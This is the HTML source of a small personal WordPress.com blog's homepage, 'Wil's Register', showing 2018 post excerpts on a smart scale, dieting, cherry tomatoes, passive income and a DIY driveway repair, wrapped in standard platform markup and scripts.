content="WordPress.com" /> <link rel='shortlink' href='https://wp.me/a9mHt' /> <!-- Jetpack Open Graph Tags --> <meta property="og:type" content="website" /> <meta property="og:title" content="Wil&#039;s Register" /> <meta property="og:url" content="https://wilsregister.com/" /> <meta property="og:site_name" content="Wil&#039;s Register" /> <meta property="og:image" content="https://twosevenproductions.files.wordpress.com/2018/09/cropped-wils-register-logo6.jpg?w=200" /> <meta property="og:image:width" content="200" /> <meta property="og:image:height" content="200" /> <meta property="og:locale" content="en_US" /> <meta name="twitter:site" content="@wordpressdotcom" /> <!-- End Jetpack Open Graph Tags --> <link rel="search" type="application/opensearchdescription+xml" href="https://wilsregister.com/osd.xml" title="Wil&#039;s Register" /> <link rel="search" type="application/opensearchdescription+xml" href="https://s1.wp.com/opensearch.xml" title="WordPress.com" /> <meta name="application-name" content="Wil&#039;s Register" /><meta name="msapplication-window" content="width=device-width;height=device-height" /><meta name="msapplication-task" content="name=Subscribe;action-uri=https://wilsregister.com/feed/;icon-uri=https://twosevenproductions.files.wordpress.com/2018/09/cropped-wils-register-logo6.jpg?w=16" /><meta name="msapplication-task" content="name=Sign up for a free blog;action-uri=http://wordpress.com/signup/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="msapplication-task" content="name=WordPress.com Support;action-uri=http://support.wordpress.com/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="msapplication-task" content="name=WordPress.com Forums;action-uri=http://forums.wordpress.com/;icon-uri=https://s1.wp.com/i/favicon.ico" /><style type="text/css" id="syntaxhighlighteranchor"></style> <link rel="icon" href="https://twosevenproductions.files.wordpress.com/2018/09/cropped-wils-register-logo6.jpg?w=32" sizes="32x32" /> <link rel="icon" href="https://twosevenproductions.files.wordpress.com/2018/09/cropped-wils-register-logo6.jpg?w=192" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://twosevenproductions.files.wordpress.com/2018/09/cropped-wils-register-logo6.jpg?w=180" /> <meta name="msapplication-TileImage" content="https://twosevenproductions.files.wordpress.com/2018/09/cropped-wils-register-logo6.jpg?w=270" /> </head> <body class="home blog mp6 customizer-styles-applied post-layout-two-columns post-layout-columns highlander-enabled highlander-light infinite-scroll neverending"> <div id="page" class="hfeed site"> <a class="skip-link screen-reader-text" href="#content">Skip to content</a> <div id="header-top" class="header-bar-wrap"> <div id="header-bar" class="header-bar container clearfix"> </div> </div> <header id="masthead" class="site-header clearfix" role="banner"> <div class="header-main container clearfix"> <div id="logo" class="site-branding clearfix"> <h1 class="site-title"><a href="https://wilsregister.com/" rel="home">Wil&#039;s Register</a></h1> </div><!-- .site-branding --> </div><!-- .header-main --> <div id="main-navigation-wrap" class="primary-navigation-wrap"> <nav id="main-navigation" class="primary-navigation navigation container clearfix" role="navigation"> <div class="main-navigation-menu-wrap"> <ul id="menu-primary" class="main-navigation-menu"><li id="menu-item-6" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-6"><a href="/" aria-current="page">Home</a></li> <li id="menu-item-7" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7"><a href="https://wilsregister.com/contact/">Contact</a></li> </ul> </div> </nav><!-- #main-navigation --> </div> </header><!-- #masthead --> <div id="content" class="site-content container clearfix"> <section id="primary" class="content-archive content-area"> <main id="main" class="site-main" role="main"> <div id="post-wrapper" class="post-wrapper clearfix"> <div class="post-column clearfix"> <article id="post-100" class="post-100 post type-post status-publish format-standard has-post-thumbnail hentry category-things-i-use-to-make-life-a-little-easier tag-biometrics tag-dieting tag-health tag-weight-loss"> <a href="https://wilsregister.com/2018/09/08/the-yunmai-smart-scale/" rel="bookmark"> <img width="600" height="280" src="https://twosevenproductions.files.wordpress.com/2018/09/bodyfat1.jpg?w=600&amp;h=280&amp;crop=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://twosevenproductions.files.wordpress.com/2018/09/bodyfat1.jpg?w=600&amp;h=280&amp;crop=1 600w, https://twosevenproductions.files.wordpress.com/2018/09/bodyfat1.jpg?w=150&amp;h=70&amp;crop=1 150w, https://twosevenproductions.files.wordpress.com/2018/09/bodyfat1.jpg?w=300&amp;h=140&amp;crop=1 300w" sizes="(max-width: 600px) 100vw, 600px" data-attachment-id="105" data-permalink="https://wilsregister.com/2018/09/08/the-yunmai-smart-scale/bodyfat/" data-orig-file="https://twosevenproductions.files.wordpress.com/2018/09/bodyfat1.jpg" data-orig-size="750,1334" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="bodyfat" data-image-description="" data-medium-file="https://twosevenproductions.files.wordpress.com/2018/09/bodyfat1.jpg?w=169" data-large-file="https://twosevenproductions.files.wordpress.com/2018/09/bodyfat1.jpg?w=576" /> </a> <header class="entry-header"> <h2 class="entry-title"><a href="https://wilsregister.com/2018/09/08/the-yunmai-smart-scale/" rel="bookmark">The Yunmai Smart Scale</a></h2> <div class="entry-meta clearfix"><span class="meta-date"><a href="https://wilsregister.com/2018/09/08/the-yunmai-smart-scale/" title="7:39 pm" rel="bookmark"><time class="entry-date published updated" datetime="2018-09-08T19:39:44-04:00">September 8, 2018</time></a></span><span class="meta-author"> <span class="author vcard"><a class="url fn n" href="https://wilsregister.com/author/enrigh03/" title="View all posts by ~Dan" rel="author">~Dan</a></span></span></div> </header><!-- .entry-header --> <div class="entry-content entry-excerpt clearfix"> <p>If you read my post, A Different Kind of Progress (f.k.a The Madness) you might remember the Yunmai Smart Scale I briefly mentioned. I&#8217;ve had the scale</p></div> <div class="read-more"><a href="https://wilsregister.com/2018/09/08/the-yunmai-smart-scale/" class="more-link">Continue reading</a></p> </div><!-- .entry-content --> </article> </div> <div class="post-column clearfix"> <article id="post-93" class="post-93 post type-post status-publish format-standard has-post-thumbnail hentry category-personal-health tag-dieting tag-diets tag-type-2-diabetes tag-weight-loss tag-yunmai"> <a href="https://wilsregister.com/2018/09/08/a-different-kind-of-progress-f-k-a-the-madness/" rel="bookmark"> <img width="600" height="280" src="https://twosevenproductions.files.wordpress.com/2018/09/yunmai.jpg?w=600&amp;h=280&amp;crop=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://twosevenproductions.files.wordpress.com/2018/09/yunmai.jpg?w=600&amp;h=280&amp;crop=1 600w, https://twosevenproductions.files.wordpress.com/2018/09/yunmai.jpg?w=150&amp;h=70&amp;crop=1 150w, https://twosevenproductions.files.wordpress.com/2018/09/yunmai.jpg?w=300&amp;h=140&amp;crop=1 300w" sizes="(max-width: 600px) 100vw, 600px" data-attachment-id="96" data-permalink="https://wilsregister.com/2018/09/08/a-different-kind-of-progress-f-k-a-the-madness/yunmai/" data-orig-file="https://twosevenproductions.files.wordpress.com/2018/09/yunmai.jpg" data-orig-size="750,1334" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="yunmai" data-image-description="" data-medium-file="https://twosevenproductions.files.wordpress.com/2018/09/yunmai.jpg?w=169" data-large-file="https://twosevenproductions.files.wordpress.com/2018/09/yunmai.jpg?w=576" /> </a> <header class="entry-header"> <h2 class="entry-title"><a href="https://wilsregister.com/2018/09/08/a-different-kind-of-progress-f-k-a-the-madness/" rel="bookmark">A Different Kind of Progress (f.k.a The Madness</a></h2> <div class="entry-meta clearfix"><span class="meta-date"><a href="https://wilsregister.com/2018/09/08/a-different-kind-of-progress-f-k-a-the-madness/" title="10:41 am" rel="bookmark"><time class="entry-date published updated" datetime="2018-09-08T10:41:32-04:00">September 8, 2018</time></a></span><span class="meta-author"> <span class="author vcard"><a class="url fn n" href="https://wilsregister.com/author/enrigh03/" title="View all posts by ~Dan" rel="author">~Dan</a></span></span></div> </header><!-- .entry-header --> <div class="entry-content entry-excerpt clearfix"> <p>OK, so, Madness is a tad heavy handed. Although, anyone who has been on “this side of the table”, so to speak, will admit that reigning in bad</p></div> <div class="read-more"><a href="https://wilsregister.com/2018/09/08/a-different-kind-of-progress-f-k-a-the-madness/" class="more-link">Continue reading</a></p> </div><!-- .entry-content --> </article> </div> <div class="post-column clearfix"> <article id="post-65" class="post-65 post type-post status-publish format-standard has-post-thumbnail hentry category-gardening tag-cherry-tomatoes tag-gardening tag-sweet-millions"> <a href="https://wilsregister.com/2018/08/31/sweet-millions/" rel="bookmark"> <img width="600" height="280" src="https://twosevenproductions.files.wordpress.com/2018/08/tomatoes.jpeg?w=600&amp;h=280&amp;crop=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://twosevenproductions.files.wordpress.com/2018/08/tomatoes.jpeg?w=600&amp;h=280&amp;crop=1 600w, https://twosevenproductions.files.wordpress.com/2018/08/tomatoes.jpeg?w=1200&amp;h=560&amp;crop=1 1200w, https://twosevenproductions.files.wordpress.com/2018/08/tomatoes.jpeg?w=150&amp;h=70&amp;crop=1 150w, https://twosevenproductions.files.wordpress.com/2018/08/tomatoes.jpeg?w=300&amp;h=140&amp;crop=1 300w, https://twosevenproductions.files.wordpress.com/2018/08/tomatoes.jpeg?w=768&amp;h=358&amp;crop=1 768w, https://twosevenproductions.files.wordpress.com/2018/08/tomatoes.jpeg?w=1024&amp;h=478&amp;crop=1 1024w" sizes="(max-width: 600px) 100vw, 600px" data-attachment-id="70" data-permalink="https://wilsregister.com/2018/08/31/sweet-millions/tomatoes/" data-orig-file="https://twosevenproductions.files.wordpress.com/2018/08/tomatoes.jpeg" data-orig-size="3024,4032" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.2&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 6s&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1533812939&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;4.15&quot;,&quot;iso&quot;:&quot;25&quot;,&quot;shutter_speed&quot;:&quot;0.0018214936247723&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="tomatoes" data-image-description="" data-medium-file="https://twosevenproductions.files.wordpress.com/2018/08/tomatoes.jpeg?w=225" data-large-file="https://twosevenproductions.files.wordpress.com/2018/08/tomatoes.jpeg?w=768" /> </a> <header class="entry-header"> <h2 class="entry-title"><a href="https://wilsregister.com/2018/08/31/sweet-millions/" rel="bookmark">Sweet Millions!</a></h2> <div class="entry-meta clearfix"><span class="meta-date"><a href="https://wilsregister.com/2018/08/31/sweet-millions/" title="3:33 pm" rel="bookmark"><time class="entry-date published updated" datetime="2018-08-31T15:33:29-04:00">August 31, 2018</time></a></span><span class="meta-author"> <span class="author vcard"><a class="url fn n" href="https://wilsregister.com/author/enrigh03/" title="View all posts by ~Dan" rel="author">~Dan</a></span></span></div> </header><!-- .entry-header --> <div class="entry-content entry-excerpt clearfix"> <p>Unfortunately, this has nothing to do with me telling you about piles of money. It&#8217;s about the &#8216;Sweet Million&#8217; Cherry Tomato and my first ever</p></div> <div class="read-more"><a href="https://wilsregister.com/2018/08/31/sweet-millions/" class="more-link">Continue reading</a></p> </div><!-- .entry-content --> </article> </div> <div class="post-column clearfix"> <article id="post-56" class="post-56 post type-post status-publish format-standard hentry category-personal-finance"> <header class="entry-header"> <h2 class="entry-title"><a href="https://wilsregister.com/2018/08/31/the-passive-100-part-4/" rel="bookmark">The Passive $100 (Part 4)</a></h2> <div class="entry-meta clearfix"><span class="meta-date"><a href="https://wilsregister.com/2018/08/31/the-passive-100-part-4/" title="1:14 pm" rel="bookmark"><time class="entry-date published updated" datetime="2018-08-31T13:14:34-04:00">August 31, 2018</time></a></span><span class="meta-author"> <span class="author vcard"><a class="url fn n" href="https://wilsregister.com/author/enrigh03/" title="View all posts by ~Dan" rel="author">~Dan</a></span></span></div> </header><!-- .entry-header --> <div class="entry-content entry-excerpt clearfix"> <p>In Part 3 we left talking about how to make up for the $57 left to achieve a monthly passive $100. One thing I realized recently is</p></div> <div class="read-more"><a href="https://wilsregister.com/2018/08/31/the-passive-100-part-4/" class="more-link">Continue reading</a></p> </div><!-- .entry-content --> </article> </div> <div class="post-column clearfix"> <article id="post-27" class="post-27 post type-post status-publish format-standard hentry category-personal-finance"> <header class="entry-header"> <h2 class="entry-title"><a href="https://wilsregister.com/2018/08/19/the-passive-100-part-3/" rel="bookmark">The Passive $100 (Part 3)</a></h2> <div class="entry-meta clearfix"><span class="meta-date"><a href="https://wilsregister.com/2018/08/19/the-passive-100-part-3/" title="7:14 pm" rel="bookmark"><time class="entry-date published updated" datetime="2018-08-19T19:14:03-04:00">August 19, 2018</time></a></span><span class="meta-author"> <span class="author vcard"><a class="url fn n" href="https://wilsregister.com/author/enrigh03/" title="View all posts by ~Dan" rel="author">~Dan</a></span></span></div> </header><!-- .entry-header --> <div class="entry-content entry-excerpt clearfix"> <p>In my last post I mentioned passive income. Passive income is described as income generated &#8220;without doing much&#8221;. That&#8217;s somewhat vague, I think. What I consider passive</p></div> <div class="read-more"><a href="https://wilsregister.com/2018/08/19/the-passive-100-part-3/" class="more-link">Continue reading</a></p> </div><!-- .entry-content --> </article> </div> <div class="post-column clearfix"> <article id="post-30" class="post-30 post type-post status-publish format-standard has-post-thumbnail hentry category-diy tag-diy tag-driveway-repair tag-sinkhole tag-sinkhole-asphalt"> <a href="https://wilsregister.com/2018/08/17/di-why-not/" rel="bookmark"> <img width="600" height="280" src="https://twosevenproductions.files.wordpress.com/2018/08/patch_from_afar.jpeg?w=600&amp;h=280&amp;crop=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://twosevenproductions.files.wordpress.com/2018/08/patch_from_afar.jpeg?w=600&amp;h=280&amp;crop=1 600w, https://twosevenproductions.files.wordpress.com/2018/08/patch_from_afar.jpeg?w=1200&amp;h=560&amp;crop=1 1200w, https://twosevenproductions.files.wordpress.com/2018/08/patch_from_afar.jpeg?w=150&amp;h=70&amp;crop=1 150w, https://twosevenproductions.files.wordpress.com/2018/08/patch_from_afar.jpeg?w=300&amp;h=140&amp;crop=1 300w, https://twosevenproductions.files.wordpress.com/2018/08/patch_from_afar.jpeg?w=768&amp;h=358&amp;crop=1 768w, https://twosevenproductions.files.wordpress.com/2018/08/patch_from_afar.jpeg?w=1024&amp;h=478&amp;crop=1 1024w" sizes="(max-width: 600px) 100vw, 600px" data-attachment-id="40" data-permalink="https://wilsregister.com/2018/08/17/di-why-not/patch_from_afar/" data-orig-file="https://twosevenproductions.files.wordpress.com/2018/08/patch_from_afar.jpeg" data-orig-size="4032,3024" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.2&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 6s&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1533062966&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;4.15&quot;,&quot;iso&quot;:&quot;40&quot;,&quot;shutter_speed&quot;:&quot;0.033333333333333&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="patch_from_afar" data-image-description="" data-medium-file="https://twosevenproductions.files.wordpress.com/2018/08/patch_from_afar.jpeg?w=300" data-large-file="https://twosevenproductions.files.wordpress.com/2018/08/patch_from_afar.jpeg?w=840" /> </a> <header class="entry-header"> <h2 class="entry-title"><a href="https://wilsregister.com/2018/08/17/di-why-not/" rel="bookmark">DI Why Not?</a></h2> <div class="entry-meta clearfix"><span class="meta-date"><a href="https://wilsregister.com/2018/08/17/di-why-not/" title="4:23 pm" rel="bookmark"><time class="entry-date published updated" datetime="2018-08-17T16:23:48-04:00">August 17, 2018</time></a></span><span class="meta-author"> <span class="author vcard"><a class="url fn n" href="https://wilsregister.com/author/enrigh03/" title="View all posts by ~Dan" rel="author">~Dan</a></span></span></div> </header><!-- .entry-header --> <div class="entry-content entry-excerpt clearfix"> <p>One thing we don&#8217;t anticipate when buying a home is just how much work it actually is keeping it all together. Nobody is foolish enough to think</p></div> <div class="read-more"><a href="https://wilsregister.com/2018/08/17/di-why-not/" class="more-link">Continue reading</a></p> </div><!-- .entry-content --> </article> </div> </div> <div class="post-pagination clearfix"> <span aria-current='page' class='page-numbers current'>1</span> <a class='page-numbers' href='https://wilsregister.com/page/2/'>2</a> <a class="next page-numbers" href="https://wilsregister.com/page/2/"><span class="screen-reader-text">Next Posts</span>&raquo;</a> </div> </main><!-- #main --> </section><!-- #primary --> <section id="secondary" class="sidebar widget-area clearfix" role="complementary"> <div class="widget-wrap"><aside id="categories-3" class="widget widget_categories clearfix"><div class="widget-header"><h3 class="widget-title">Content</h3></div> <ul> <li class="cat-item cat-item-4315"><a href="https://wilsregister.com/category/diy/">DIY</a> </li> <li class="cat-item cat-item-1833"><a href="https://wilsregister.com/category/gardening/">Gardening</a> </li> <li class="cat-item cat-item-10625"><a href="https://wilsregister.com/category/personal-finance/">Personal Finance</a> </li> <li class="cat-item cat-item-263360"><a href="https://wilsregister.com/category/personal-health/">Personal Health</a> </li> <li class="cat-item cat-item-648474623"><a href="https://wilsregister.com/category/things-i-use-to-make-life-a-little-easier/">Things I Use to Make Life a Little Easier</a> </li> </ul> </aside></div> </section><!-- #secondary --> </div><!-- #content --> <div id="footer" class="footer-wrap"> <footer id="colophon" class="site-footer container clearfix" role="contentinfo"> <div class="site-info"> <a href="https://wordpress.com/?ref=footer_blog">Blog at WordPress.com.</a> </div><!-- .site-info --> </footer><!-- #colophon --> </div> </div><!-- #page --> <script type="text/javascript"> //<![CDATA[ var infiniteScroll = JSON.parse( decodeURIComponent( '%7B%22settings%22%3A%7B%22id%22%3A%22post-wrapper%22%2C%22ajaxurl%22%3A%22https%3A%5C%2F%5C%2Fwilsregister.com%5C%2F%3Finfinity%3Dscrolling%22%2C%22type%22%3A%22scroll%22%2C%22wrapper%22%3Afalse%2C%22wrapper_class%22%3A%22infinite-wrap%22%2C%22footer%22%3Atrue%2C%22click_handle%22%3A%221%22%2C%22text%22%3A%22Older%20posts%22%2C%22totop%22%3A%22Scroll%20back%20to%20top%22%2C%22currentday%22%3A%2217.08.18%22%2C%22order%22%3A%22DESC%22%2C%22scripts%22%3A%5B%5D%2C%22styles%22%3A%5B%5D%2C%22google_analytics%22%3Afalse%2C%22offset%22%3A0%2C%22history%22%3A%7B%22host%22%3A%22wilsregister.com%22%2C%22path%22%3A%22%5C%2Fpage%5C%2F%25d%5C%2F%22%2C%22use_trailing_slashes%22%3Atrue%2C%22parameters%22%3A%22%22%7D%2C%22query_args%22%3A%7B%22error%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A0%2C%22post_parent%22%3A%22%22%2C%22subpost%22%3A%22%22%2C%22subpost_id%22%3A%22%22%2C%22attachment%22%3A%22%22%2C%22attachment_id%22%3A0%2C%22name%22%3A%22%22%2C%22pagename%22%3A%22%22%2C%22page_id%22%3A0%2C%22second%22%3A%22%22%2C%22minute%22%3A%22%22%2C%22hour%22%3A%22%22%2C%22day%22%3A0%2C%22monthnum%22%3A0%2C%22year%22%3A0%2C%22w%22%3A0%2C%22category_name%22%3A%22%22%2C%22tag%22%3A%22%22%2C%22cat%22%3A%22%22%2C%22tag_id%22%3A%22%22%2C%22author%22%3A%22%22%2C%22author_name%22%3A%22%22%2C%22feed%22%3A%22%22%2C%22tb%22%3A%22%22%2C%22paged%22%3A0%2C%22meta_key%22%3A%22%22%2C%22meta_value%22%3A%22%22%2C%22preview%22%3A%22%22%2C%22s%22%3A%22%22%2C%22sentence%22%3A%22%22%2C%22title%22%3A%22%22%2C%22fields%22%3A%22%22%2C%22menu_order%22%3A%22%22%2C%22embed%22%3A%22%22%2C%22category__in%22%3A%5B%5D%2C%22category__not_in%22%3A%5B%5D%2C%22category__and%22%3A%5B%5D%2C%22post__in%22%3A%5B%5D%2C%22post__not_in%22%3A%5B%5D%2C%22post_name__in%22%3A%5B%5D%2C%22tag__in%22%3A%5B%5D%2C%22tag__not_in%22%3A%5B%5D%2C%22tag__and%22%3A%5B%5D%2C%22tag_slug__in%22%3A%5B%5D%2C%22tag_slug__and%22%3A%5B%5D%2C%22post_parent__in%22%3A%5B%5D%2C%22post_parent__not_in%22%3A%5B%5D%2C%22author__in%22%3A%5B%5D%2C%22author__not_in%22%3A%5B%5D%2C%22posts_per_page%22%3A6%2C%22ignore_sticky_posts%22%3Afalse%2C%22suppress_filters%22%3Afalse%2C%22cache_results%22%3Afalse%2C%22update_post_term_cache%22%3Atrue%2C%22lazy_load_term_meta%22%3Atrue%2C%22update_post_meta_cache%22%3Atrue%2C%22post_type%22%3A%22%22%2C%22nopaging%22%3Afalse%2C%22comments_per_page%22%3A%2250%22%2C%22no_found_rows%22%3Afalse%2C%22order%22%3A%22DESC%22%7D%2C%22last_post_date%22%3A%222018-08-17%2016%3A23%3A48%22%2C%22stats%22%3A%22blog%3D149995575%26v%3Dwpcom%26tz%3D-4%26user_id%3D0%26subd%3Dtwosevenproductions%26x_pagetype%3Dinfinite%22%7D%7D' ) ); //]]> </script> <!-- --> <script type='text/javascript' src='//0.gravatar.com/js/gprofiles.js?ver=201920y'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='https://s1.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1380573781h'></script> <script> //initialize and attach hovercards to all gravatars jQuery( document ).ready( function( $ ) { if (typeof Gravatar === "undefined"){ return; } if ( typeof Gravatar.init !== "function" ) { return; } Gravatar.profile_cb = function( hash, id ) { WPGroHo.syncProfileData( hash, id ); }; Gravatar.my_hash = WPGroHo.my_hash; Gravatar.init( 'body', '#wp-admin-bar-my-account' ); }); </script> <div style="display:none"> </div> <script type='text/javascript'> /* <![CDATA[ */ var HighlanderComments = {"loggingInText":"Logging In\u2026","submittingText":"Posting Comment\u2026","postCommentText":"Post Comment","connectingToText":"Connecting to %s","commentingAsText":"%1$s: You are commenting using your %2$s account.","logoutText":"Log Out","loginText":"Log In","connectURL":"https:\/\/twosevenproductions.wordpress.com\/public.api\/connect\/?action=request&domain=wilsregister.com","logoutURL":"https:\/\/twosevenproductions.wordpress.com\/wp-login.php?action=logout&_wpnonce=b319ed9855","homeURL":"https:\/\/wilsregister.com\/","postID":"100","gravDefault":"identicon","enterACommentError":"Please enter a comment","enterEmailError":"Please enter your email address here","invalidEmailError":"Invalid email address","enterAuthorError":"Please enter your name here","gravatarFromEmail":"This picture will show whenever you leave a comment. Click to customize it.","logInToExternalAccount":"Log in to use details from one of these accounts.","change":"Change","changeAccount":"Change Account","comment_registration":"","userIsLoggedIn":"","isJetpack":"","text_direction":"ltr"}; /* ]]> */ </script> <script type='text/javascript' src='https://s2.wp.com/_static/??/wp-content/js/jquery/jquery.autoresize.js,/wp-content/mu-plugins/highlander-comments/script.js?m=1551752381j'></script> <div id="infinite-footer"> <div class="container"> <div class="blog-info"> <a id="infinity-blog-title" href="https://wilsregister.com/" rel="home"> Wil&#039;s Register </a> </div> <div class="blog-credits"> <a href="https://wordpress.com/?ref=footer_blog">Blog at WordPress.com.</a> </div> </div> </div><!-- #infinite-footer --> <div id="carousel-reblog-box"> <form action="#" name="carousel-reblog"> <textarea id="carousel-reblog-content" name="carousel-reblog-content" placeholder="Add your thoughts here... (optional)"></textarea> <label for="carousel-reblog-to-blog-id" id="carousel-reblog-lblogid">Post to</label> <select name="carousel-reblog-to-blog-id" id="carousel-reblog-to-blog-id"> </select> <div class="submit"> <span class="canceltext"><a href="#" class="cancel">Cancel</a></span> <input type="submit" name="carousel-reblog-submit" class="button" id="carousel-reblog-submit" value="Reblog Post" /> <input type="hidden" id="carousel-reblog-blog-id" value="149995575" /> <input type="hidden" id="carousel-reblog-blog-url" value="https://wilsregister.com" /> <input type="hidden" id="carousel-reblog-blog-title" value="Wil&#039;s Register" /> <input type="hidden" id="carousel-reblog-post-url" value="" /> <input type="hidden" id="carousel-reblog-post-title" value="" /> </div> <input type="hidden" id="_wpnonce" name="_wpnonce" value="b8217d2509" /><input type="hidden" name="_wp_http_referer" value="/" /> </form> <div class="arrow"></div> </div> <link rel='stylesheet' id='all-css-0-3' href='https://s0.wp.com/_static/??/wp-content/mu-plugins/carousel/jetpack-carousel.css,/wp-content/mu-plugins/tiled-gallery/tiled-gallery.css?m=1524699534j&cssminify=yes' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var actionbardata = {"siteID":"149995575","siteName":"Wil's Register","siteURL":"https:\/\/wilsregister.com","icon":"<img alt='' src='https:\/\/twosevenproductions.files.wordpress.com\/2018\/09\/cropped-wils-register-logo6.jpg?w=50' class='avatar avatar-50' height='50' width='50' \/>","canManageOptions":"","canCustomizeSite":"","isFollowing":"","themeSlug":"premium\/tortuga","signupURL":"https:\/\/wordpress.com\/start\/","loginURL":"https:\/\/wordpress.com\/log-in?redirect_to=https%3A%2F%2Fwilsregister.com%2F2018%2F09%2F08%2Fthe-yunmai-smart-scale%2F&signup_flow=account&domain=wilsregister.com","themeURL":"https:\/\/wordpress.com\/theme\/tortuga\/","xhrURL":"https:\/\/wilsregister.com\/wp-admin\/admin-ajax.php","nonce":"1c05bece34","isSingular":"","isFolded":"","isLoggedIn":"","isMobile":"","subscribeNonce":"<input type=\"hidden\" id=\"_wpnonce\" name=\"_wpnonce\" value=\"e250862190\" \/>","referer":"https:\/\/wilsregister.com\/","canFollow":"1","feedID":"86390952","statusMessage":"","customizeLink":"https:\/\/twosevenproductions.wordpress.com\/wp-admin\/customize.php?url=https%3A%2F%2Ftwosevenproductions.wordpress.com%2F","i18n":{"view":"View site","follow":"Follow","following":"Following","edit":"Edit","login":"Log in","signup":"Sign up","customize":"Customize","report":"Report this content","themeInfo":"Get theme: Tortuga","shortlink":"Copy shortlink","copied":"Copied","followedText":"New posts from this site will now appear in your <a href=\"https:\/\/wordpress.com\/\">Reader<\/a>","foldBar":"Collapse this bar","unfoldBar":"Expand this bar","editSubs":"Manage subscriptions","viewReader":"View site in Reader","viewReadPost":"View post in Reader","subscribe":"Sign me up","enterEmail":"Enter your email address","followers":"","alreadyUser":"Already have a WordPress.com account? <a href=\"https:\/\/wordpress.com\/log-in?redirect_to=https%3A%2F%2Fwilsregister.com%2F2018%2F09%2F08%2Fthe-yunmai-smart-scale%2F&signup_flow=account&domain=wilsregister.com\">Log in now.<\/a>","stats":"Stats"}}; /* ]]> */ </script> <script type='text/javascript'> /* <![CDATA[ */ var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"https:\/\/wilsregister.com\/wp-admin\/admin-ajax.php","nonce":"20067da137","display_exif":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"https:\/\/twosevenproductions.wordpress.com\/wp-login.php?redirect_to=https%3A%2F%2Fwilsregister.com%2F2018%2F09%2F08%2Fthe-yunmai-smart-scale%2F","blog_id":"149995575","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">Email (Required)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Name (Required)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Website<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>","reblog":"Reblog","reblogged":"Reblogged","reblog_add_thoughts":"Add your thoughts here... (optional)","reblogging":"Reblogging...","post_reblog":"Post Reblog","stats_query_args":"blog=149995575&v=wpcom&tz=-4&user_id=0&subd=twosevenproductions","is_public":"1","reblog_enabled":""}; /* ]]> */ </script> <script type='text/javascript' 